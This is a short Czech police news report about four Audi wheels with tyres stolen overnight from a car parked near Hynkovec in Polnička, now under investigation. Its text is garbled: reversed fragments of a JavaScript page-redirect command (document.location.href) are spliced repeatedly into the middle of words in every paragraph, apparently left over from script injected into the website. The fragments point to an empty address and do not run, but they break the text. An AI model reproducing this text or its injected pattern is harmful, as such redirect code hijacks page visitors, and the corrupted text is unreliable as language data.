Rainbow page separator

Ze zaparkovaného auta v průběhu večera zmizela všechna kola

Pátek, 10. srpna 2018

Policie, auto

Polnička / Po dosud neznámém pachateli, který ze zaparkovaného vozidla v katastrálním území Polničky odcizil kola a způsobil tak jeho majiteli hmotnou škodu ve výši zhruba třicet tisíc korun, pátrají žďárští policisté.
„K činu došlo ve večerních hodinách v katastrálním území obce Polnička. Osobní au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomobil značky Audi byl zaparkovaný na cestě u cha[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tové osady Hynkovec. Pachatel demon[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toval a následně odcizil čtyři lité originální disky Audi stříbrné barvy o velikosti devatenáct, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to včetně letních pneumatik a jisticích šroubů,“ vyjádřila se policejní mluvčí Stanislava Miláčková.
Přivolaní policisté mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to ohledali, zajistili s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topy, provedli šetření a vše zadokumen[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovali. Zahájili úkony trestního řízení pro podezření ze spáchání přečinu krádeže. Případ nadále prověřují a po pachateli pátrají. Za takový trestný čin zloději hrozí až dvouletý trest odnětí svobody.